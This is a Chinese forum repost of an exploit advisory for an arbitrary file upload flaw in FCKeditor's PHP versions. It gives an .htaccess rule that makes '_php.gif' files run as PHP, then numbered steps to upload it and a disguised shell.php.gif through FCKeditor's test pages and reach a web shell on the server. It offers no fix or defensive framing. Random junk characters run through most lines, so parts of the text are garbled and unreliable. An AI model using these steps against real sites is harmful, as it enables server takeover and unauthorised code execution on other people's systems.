FCKeditor所有php版本Upload上传漏洞
) `1 A/ d" U, f1 c- p作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
+ x. L+ ~3 g0 d6 `0 k减小字体 增大字体; v; s; U8 J' j4 y* a0 Z' r$ ~9 p
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
' P5 M4 a5 B$ D: ][+] Date: 2011
( W! A- y) x& V9 w5 I8 R[+] Author : sinesafe.cn$ J; b* E, s! Y) }0 y* A0 j1 K
[+] Website : WwW.sinesafe.cn
' R o2 L( S# z1 r———————————————————% o/ z: V6 u; f- |
1.create a htaccess file:
- Z6 E; ?# B( _code:# g& v' B) J1 v, a& D4 H
<FilesMatch “_php.gif”>+ X4 L; X& q; [3 c' q+ t* M4 n
SetHandler application/x-httpd-php
7 @ M. P+ `2 k3 ^1 M% H</FilesMatch>
( N6 o ?8 r. h* y2 M
3 i" g0 k1 w4 q; q1 s! N2.Now upload this htaccess with FCKeditor.
# L) r' d, K* V) J/ L0 r
: x6 E* ]$ U+ Q) I h, xhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html. P5 z. Y: l# t- ~; j) s
$ ]8 j- L z7 l3 t6 m- T
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
: w7 k/ D8 j6 w$ A! R3 ~
* v/ Z( ]) A' d3 |3 j———————————————————————————————-
0 S- ]7 W2 }( _, L9 ~4 U. n3.Now upload shell.php.gif with FCKeditor.0 A v$ _, U, E9 V' r# F( P: e
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
# n4 c5 k; }% U5.http://www.sinesafe.cn/anything/shell_php.gif
+ n3 A; ]$ o$ P4 H6 R6.Now shell is available from server. |
( V M2 X" c4 Y$ F; R
/ e) S x# ]% [+ j3 |* E
' L9 a: i4 ?5 P; k" T
|
发表于 2013-10-27 17:25:21
收藏
支持
反对